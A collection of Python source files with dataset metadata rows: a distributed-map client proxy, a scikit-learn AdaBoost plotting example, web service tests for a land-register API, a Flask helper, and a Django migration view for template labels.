response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetAsyncCodec.decodeResponse(msg2).response
def Get(self, key, threadId):
msg=mapcodec.MapGetCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
self.connection.adjustPartitionId(key,msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetCodec.decodeResponse(msg2).response
def GetEntryView(self, key, threadId):
msg=mapcodec.MapGetEntryViewCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetEntryViewCodec.decodeResponse(msg2).dataEntryView
def IsEmpty(self, ):
msg=mapcodec.MapIsEmptyCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapIsEmptyCodec.decodeResponse(msg2).response
def IsLocked(self, key):
msg=mapcodec.MapIsLockedCodec.encodeRequest( encode.encodestring(self.title), key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapIsLockedCodec.decodeResponse(msg2).response
def KeySet(self):
msg=mapcodec.MapKeySetCodec.encodeRequest(encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapKeySetCodec.decodeResponse(msg2).set
def KeySetWithPagingPredicate(self, predicate):
msg=mapcodec.MapKeySetWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapKeySetWithPagingPredicateCodec.decodeResponse(msg2).set
def KeySetWithPredicate(self, predicate):
msg=mapcodec.MapKeySetWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapKeySetWithPredicateCodec.decodeResponse(msg2).set
def LoadAll(self, replaceExistingValues):
msg=mapcodec.MapLoadAllCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(replaceExistingValues))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapLoadAllCodec.decodeResponse(msg2)
def LoadGivenKeys(self, keys, replaceExistingValues):
msg=mapcodec.MapLoadGivenKeysCodec.encodeRequest( encode.encodestring(self.title), keys, encode.encodeboolean(replaceExistingValues))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapLoadGivenKeysCodec.decodeResponse(msg2)
def Lock(self, key, threadId, ttl):
msg=mapcodec.MapLockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapLockCodec.decodeResponse(msg2)
def PutAll(self, entries):
msg=mapcodec.MapPutAllCodec.encodeRequest( encode.encodestring(self.title), entries)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutAllCodec.decodeResponse(msg2)
def PutAsync(self, key, value, threadId, ttl):
msg=mapcodec.MapPutAsyncCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutAsyncCodec.decodeResponse(msg2).response
def Put(self, key, value, threadId, ttl):
msg=mapcodec.MapPutCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
self.connection.adjustPartitionId(msg,key)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutCodec.decodeResponse(msg2).response
def PutIfAbsent(self, key, value, threadId, ttl):
msg=mapcodec.MapPutIfAbsentCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutIfAbsentCodec.decodeResponse(msg2).response
def PutTransient(self, key, value, threadId, ttl):
msg=mapcodec.MapPutTransientCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutTransientCodec.decodeResponse(msg2)
def RemoveAsync(self, key, threadId):
msg=mapcodec.MapRemoveAsyncCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveAsyncCodec.decodeResponse(msg2).response
def Remove(self, key, threadId):
msg=mapcodec.MapRemoveCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveCodec.decodeResponse(msg2).response
def RemoveEntryListener(self, registrationId):
msg=mapcodec.MapRemoveEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(registrationId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveEntryListenerCodec.decodeResponse(msg2).response
def RemoveIfSame(self, key, value, threadId):
msg=mapcodec.MapRemoveIfSameCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveIfSameCodec.decodeResponse(msg2).response
def RemoveInterceptor(self, id):
msg=mapcodec.MapRemoveInterceptorCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(id))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveInterceptorCodec.decodeResponse(msg2).response
def RemovePartitionLostListener(self, registrationId):
msg=mapcodec.MapRemovePartitionLostListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(registrationId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemovePartitionLostListenerCodec.decodeResponse(msg2).response
def Replace(self, key, value, threadId):
msg=mapcodec.MapReplaceCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapReplaceCodec.decodeResponse(msg2).response
def ReplaceIfSame(self, key, testValue, value, threadId):
msg=mapcodec.MapReplaceIfSameCodec.encodeRequest( encode.encodestring(self.title), key, testValue, value, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapReplaceIfSameCodec.decodeResponse(msg2).response
def Set(self, key, value, threadId, ttl):
msg=mapcodec.MapSetCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapSetCodec.decodeResponse(msg2)
def Size(self, ):
msg=mapcodec.MapSizeCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg)
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapSizeCodec.decodeResponse(msg2).response
def SubmitToKey(self, entryProcessor, key):
msg=mapcodec.MapSubmitToKeyCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapSubmitToKeyCodec.decodeResponse(msg2).response
def TryLock(self, key, threadId, lease, timeout):
msg=mapcodec.MapTryLockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(lease), encode.encodeint64(timeout))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapTryLockCodec.decodeResponse(msg2).response
def TryPut(self, key, value, threadId, timeout):
msg=mapcodec.MapTryPutCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(timeout))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapTryPutCodec.decodeResponse(msg2).response
def TryRemove(self, key, threadId, timeout):
msg=mapcodec.MapTryRemoveCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(timeout))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapTryRemoveCodec.decodeResponse(msg2).response
def Unlock(self, key, threadId):
msg=mapcodec.MapUnlockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapUnlockCodec.decodeResponse(msg2)
def Values(self):
msg=mapcodec.MapValuesCodec.encodeRequest(encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapValuesCodec.decodeResponse(msg2).list
def ValuesWithPagingPredicate(self, predicate):
msg=mapcodec.MapValuesWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapValuesWithPagingPredicateCodec.decodeResponse(msg2).entrySet
def ValuesWithPredicate(self, predicate):
msg=mapcodec.MapValuesWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapValuesWithPredicateCodec.decodeResponse(msg2).list | 61.28051 | 175 | 0.76099 |
39e7cdcb8ef4d17fcaeaefc7bf1131478de86552 | 4,124 | py | Python | scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py | RTHMaK/git-squash-master | 76c4c8437dd18114968e69a698f4581927fcdabf | [
"BSD-2-Clause"
] | 1 | 2021-11-26T12:22:13.000Z | 2021-11-26T12:22:13.000Z | scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py | RTHMaK/git-squash-master | 76c4c8437dd18114968e69a698f4581927fcdabf | [
"BSD-2-Clause"
] | null | null | null | scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py | RTHMaK/git-squash-master | 76c4c8437dd18114968e69a698f4581927fcdabf | [
"BSD-2-Clause"
] | null | null | null | """
=====================================
Multi-class AdaBoosted Decision Trees
=====================================
This example reproduces Figure 1 of Zhu et al [1] and shows how boosting can
improve prediction accuracy on a multi-class problem. The classification
dataset is constructed by taking a ten-dimensional standard normal distribution
and defining three classes separated by nested concentric ten-dimensional
spheres such that roughly equal numbers of samples are in each class (quantiles
of the :math:`\chi^2` distribution).
The performance of the SAMME and SAMME.R [1] algorithms are compared. SAMME.R
uses the probability estimates to update the additive model, while SAMME uses
the classifications only. As the example illustrates, the SAMME.R algorithm
typically converges faster than SAMME, achieving a lower test error with fewer
boosting iterations. The error of each algorithm on the test set after each
boosting iteration is shown on the left, the classification error on the test
set of each tree is shown in the middle, and the boost weight of each tree is
shown on the right. All trees have a weight of one in the SAMME.R algorithm and
therefore are not shown.
.. [1] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
"""
print(__doc__)
# Author: Noel Dawe <noel.dawe@gmail.com>
#
# License: BSD 3 clause
from sklearn.externals.six.moves import zip
import matplotlib.pyplot as plt
from sklearn.datasets import make_gaussian_quantiles
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
X, y = make_gaussian_quantiles(n_samples=13000, n_features=10,
n_classes=3, random_state=1)
n_split = 3000
X_train, X_test = X[:n_split], X[n_split:]
y_train, y_test = y[:n_split], y[n_split:]
bdt_real = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1)
bdt_discrete = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1.5,
algorithm="SAMME")
bdt_real.fit(X_train, y_train)
bdt_discrete.fit(X_train, y_train)
real_test_errors = []
discrete_test_errors = []
for real_test_predict, discrete_train_predict in zip(
bdt_real.staged_predict(X_test), bdt_discrete.staged_predict(X_test)):
real_test_errors.append(
1. - accuracy_score(real_test_predict, y_test))
discrete_test_errors.append(
1. - accuracy_score(discrete_train_predict, y_test))
n_trees_discrete = len(bdt_discrete)
n_trees_real = len(bdt_real)
# Boosting might terminate early, but the following arrays are always
# n_estimators long. We crop them to the actual number of trees here:
discrete_estimator_errors = bdt_discrete.estimator_errors_[:n_trees_discrete]
real_estimator_errors = bdt_real.estimator_errors_[:n_trees_real]
discrete_estimator_weights = bdt_discrete.estimator_weights_[:n_trees_discrete]
plt.figure(figsize=(15, 5))
plt.subplot(131)
plt.plot(range(1, n_trees_discrete + 1),
discrete_test_errors, c='black', label='SAMME')
plt.plot(range(1, n_trees_real + 1),
real_test_errors, c='black',
linestyle='dashed', label='SAMME.R')
plt.legend()
plt.ylim(0.18, 0.62)
plt.ylabel('Test Error')
plt.xlabel('Number of Trees')
plt.subplot(132)
plt.plot(range(1, n_trees_discrete + 1), discrete_estimator_errors,
"b", label='SAMME', alpha=.5)
plt.plot(range(1, n_trees_real + 1), real_estimator_errors,
"r", label='SAMME.R', alpha=.5)
plt.legend()
plt.ylabel('Error')
plt.xlabel('Number of Trees')
plt.ylim((.2,
max(real_estimator_errors.max(),
discrete_estimator_errors.max()) * 1.2))
plt.xlim((-20, len(bdt_discrete) + 20))
plt.subplot(133)
plt.plot(range(1, n_trees_discrete + 1), discrete_estimator_weights,
"b", label='SAMME')
plt.legend()
plt.ylabel('Weight')
plt.xlabel('Number of Trees')
plt.ylim((0, discrete_estimator_weights.max() * 1.2))
plt.xlim((-20, n_trees_discrete + 20))
# prevent overlapping y-axis labels
plt.subplots_adjust(wspace=0.25)
plt.show()
| 34.082645 | 79 | 0.738118 |
ccfa8ea3f336b03b3ce0ce5baafc754ab34b5ff8 | 8,302 | py | Python | tests/webservice/test_getegrid.py | danduk82/pyramid_oereb | 4544ef81371aabd2a2f0759c2073f2ca51f85ff7 | [
"BSD-2-Clause"
] | null | null | null | tests/webservice/test_getegrid.py | danduk82/pyramid_oereb | 4544ef81371aabd2a2f0759c2073f2ca51f85ff7 | [
"BSD-2-Clause"
] | 2 | 2019-11-22T16:32:47.000Z | 2019-12-03T07:31:02.000Z | tests/webservice/test_getegrid.py | danduk82/pyramid_oereb | 4544ef81371aabd2a2f0759c2073f2ca51f85ff7 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import json
import math
from jsonschema import Draft4Validator
from shapely.geometry import Point, Polygon, MultiPolygon
import pytest
from pyramid.httpexceptions import HTTPBadRequest, HTTPNoContent
from pyramid_oereb.lib.records.real_estate import RealEstateRecord
from pyramid_oereb.lib.records.view_service import ViewServiceRecord
from tests import schema_json_extract, pyramid_oereb_test_config
from tests.mockrequest import MockRequest
from pyramid_oereb.views.webservice import PlrWebservice
def test_getegrid_coord_missing_parameter():
webservice = PlrWebservice(MockRequest())
with pytest.raises(HTTPBadRequest):
webservice.get_egrid_coord()
def test_getegrid_ident():
with pyramid_oereb_test_config():
request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/BLTEST/1000')
# Add params to matchdict as the view will do it for /getegrid/{format}/{identdn}/{number}
request.matchdict.update({
'format': u'json',
'identdn': u'BLTEST',
'number': u'1000'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_ident().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
real_estates = response.get('GetEGRIDResponse')
assert isinstance(real_estates, list)
assert len(real_estates) == 1
assert real_estates[0]['egrid'] == u'TEST'
assert real_estates[0]['number'] == u'1000'
assert real_estates[0]['identDN'] == u'BLTEST'
def test_getegrid_xy():
with pyramid_oereb_test_config():
url = 'http://example.com/oereb/getegrid/json/?XY=-1999999.032739449,-999998.940457533'
request = MockRequest(
current_route_url=url
)
# Add params to matchdict as the view will do it for /getegrid/{format}/
request.matchdict.update({
'format': u'json'
})
request.params.update({
'XY': '-1999999.032739449,-999998.940457533'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_coord().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
real_estates = response.get('GetEGRIDResponse')
assert isinstance(real_estates, list)
assert len(real_estates) == 2
assert real_estates[0]['egrid'] == u'TEST'
assert real_estates[0]['number'] == u'1000'
assert real_estates[0]['identDN'] == u'BLTEST'
def test_getegrid_gnss():
with pyramid_oereb_test_config():
request = MockRequest(
current_route_url='http://example.com/oereb/getegrid/json/?GNSS=-19.917989937473,32.1244978460310'
)
# Add params to matchdict as the view will do it for /getegrid/{format}/
request.matchdict.update({
'format': u'json'
})
request.params.update({
'GNSS': '32.1244978460310,-19.917989937473'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_coord().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
real_estates = response.get('GetEGRIDResponse')
assert isinstance(real_estates, list)
assert len(real_estates) == 1
assert real_estates[0]['egrid'] == u'TEST'
assert real_estates[0]['number'] == u'1000'
assert real_estates[0]['identDN'] == u'BLTEST'
def test_getegrid_ident_missing_parameter():
webservice = PlrWebservice(MockRequest())
with pytest.raises(HTTPBadRequest):
webservice.get_egrid_ident()
def test_getegrid_address():
with pyramid_oereb_test_config():
request = MockRequest(
current_route_url='http://example.com/oereb/getegrid/json/4410/test/10'
)
# Add params to matchdict as the view will do it for
# /getegrid/{format}/{postalcode}/{localisation}/{number}
request.matchdict.update({
'format': u'json',
'postalcode': u'4410',
'localisation': u'test',
'number': u'10'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_address().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
assert response.get('GetEGRIDResponse') is not None
assert response.get('GetEGRIDResponse')[0].get('egrid') == u'TEST'
assert response.get('GetEGRIDResponse')[0].get('number') == u'1000'
assert response.get('GetEGRIDResponse')[0].get('identDN') == u'BLTEST'
def test_getegrid_address_missing_parameter():
webservice = PlrWebservice(MockRequest())
with pytest.raises(HTTPBadRequest):
webservice.get_egrid_address()
def test_get_egrid_response():
with pyramid_oereb_test_config():
request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/')
# Add params to matchdict as the view will do it for /getegrid/{format}/
request.matchdict.update({
'format': u'json'
})
view_service = ViewServiceRecord('test',
1,
1.0,
{'de': 'test'},
None)
record = RealEstateRecord('test', 'BL', 'test', 1, 100,
MultiPolygon([Polygon([(0, 0), (1, 1), (1, 0)])]), view_service,
number='number', identdn='identdn', egrid='egrid')
response = PlrWebservice(request).__get_egrid_response__([record]).json
assert response == {
'GetEGRIDResponse': [{
'egrid': 'egrid',
'number': 'number',
'identDN': 'identdn'
}]
}
def test_get_egrid_response_no_content():
with pyramid_oereb_test_config():
request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/')
# Add params to matchdict as the view will do it for /getegrid/{format}/
request.matchdict.update({
'format': u'json'
})
response = PlrWebservice(request).__get_egrid_response__([])
assert isinstance(response, HTTPNoContent)
@pytest.mark.parametrize('src,dst,buffer_dist', [
('2621857.856,1259856.578', (2621857.856, 1259856.578), None),
('621857.759,259856.554', (2621857.799, 1259856.500), 1.0)
])
def test_parse_xy(src, dst, buffer_dist):
geom = PlrWebservice(MockRequest()).__parse_xy__(src, buffer_dist=buffer_dist)
if buffer_dist:
assert isinstance(geom, Polygon)
assert round(geom.area, 2) == round(math.pi, 2)
assert round(geom.centroid.x, 3) == round(dst[0], 3)
assert round(geom.centroid.y, 3) == round(dst[1], 3)
else:
assert isinstance(geom, Point)
assert round(geom.x, 3) == round(dst[0], 3)
assert round(geom.y, 3) == round(dst[1], 3)
def test_parse_gnss():
geom = PlrWebservice(MockRequest()).__parse_gnss__('47.48911,7.72866')
assert isinstance(geom, Polygon)
assert round(geom.centroid.x, 3) == 2621858.036
assert round(geom.centroid.y, 3) == 1259856.747
assert round(geom.area, 2) == round(math.pi, 2)
def test_parse_invalid_coordinates():
with pytest.raises(HTTPBadRequest):
PlrWebservice(MockRequest()).__parse_gnss__('7.72866')
with pytest.raises(HTTPBadRequest):
PlrWebservice(MockRequest()).__parse_xy__('2621857.856;1259856.578')
| 37.396396 | 110 | 0.635148 |
f391e26b8fa3d1f4d4487fcea813274a176fffce | 354 | py | Python | backend/src/util/response_generator.py | leowucn/lazykindler | 45717e08aa0ccc504a9a5e3883dc403470ae824b | [
"MIT"
] | 2 | 2021-12-22T15:00:15.000Z | 2022-03-21T10:38:30.000Z | backend/src/util/response_generator.py | leowucn/lazykindler | 45717e08aa0ccc504a9a5e3883dc403470ae824b | [
"MIT"
] | null | null | null | backend/src/util/response_generator.py | leowucn/lazykindler | 45717e08aa0ccc504a9a5e3883dc403470ae824b | [
"MIT"
] | null | null | null | from flask import Response, json
from datetime import datetime, date
def response_generator(payload, status):
return Response(response=json.dumps({"payload": payload}), status=status, mimetype='application/json')
# json serializer
def json_serial(obj):
if isinstance(obj, (datetime, date)):
return obj.isoformat()
return str(obj)
| 25.285714 | 106 | 0.731638 |
e310138c0f4ce00425baa11c92f96726e1ab9cbb | 3,328 | py | Python | gcloud/contrib/admin/migration_api/template_category.py | wkma/bk-sops | 8fb5609c0c4495c28d588fbafa9d9f5f2976929b | [
"Apache-2.0"
] | 2 | 2021-07-28T01:48:31.000Z | 2021-11-17T11:02:26.000Z | gcloud/contrib/admin/migration_api/template_category.py | wkma/bk-sops | 8fb5609c0c4495c28d588fbafa9d9f5f2976929b | [
"Apache-2.0"
] | null | null | null | gcloud/contrib/admin/migration_api/template_category.py | wkma/bk-sops | 8fb5609c0c4495c28d588fbafa9d9f5f2976929b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import traceback
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from blueapps.account.decorators import login_exempt
from gcloud.contrib.admin.migration_api.decorators import require_migrate_token
from gcloud.core.constant import TASK_CATEGORY
from gcloud import err_code
from gcloud.label.models import Label, TemplateLabelRelation
from gcloud.tasktmpl3.models import TaskTemplate
@login_exempt
@csrf_exempt
@require_POST
@require_migrate_token
def migrate_template_category(request):
try:
params = json.loads(request.body)
except Exception as e:
return JsonResponse(
{
"result": False,
"message": "request body is not a valid json: {}".format(str(e)),
"code": err_code.REQUEST_PARAM_INVALID.code,
}
)
project_id = params.get("project_id")
creator = params.get("creator", "admin")
MIGRATE_LABEL_COLOR = "#b3eafa"
category_mappings = {}
existing_labels = Label.objects.filter(project_id=project_id).values("id", "name")
label_info = {label["name"]: label["id"] for label in existing_labels}
for category_code, category_name in TASK_CATEGORY:
if category_name in label_info:
category_mappings[category_code] = label_info[category_name]
elif category_code != "Default":
label = Label(
name=category_name,
description=category_code,
is_default=False,
creator=creator,
color=MIGRATE_LABEL_COLOR,
project_id=project_id,
)
label.save()
category_mappings[category_code] = label.id
task_templates = TaskTemplate.objects.filter(project__id=project_id, is_deleted=False).values("id", "category")
label_relationships = [
TemplateLabelRelation(template_id=template["id"], label_id=category_mappings[template["category"]])
for template in task_templates
if template["category"] in category_mappings
]
try:
TemplateLabelRelation.objects.bulk_create(label_relationships, ignore_conflicts=True)
except Exception as e:
return JsonResponse(
{
"result": False,
"error": "migrate template category to labels error: {} \n {}".format(e, traceback.format_exc()),
}
)
return JsonResponse({"result": True, "data": "migrate template category to labels success"})
| 39.619048 | 115 | 0.696514 |
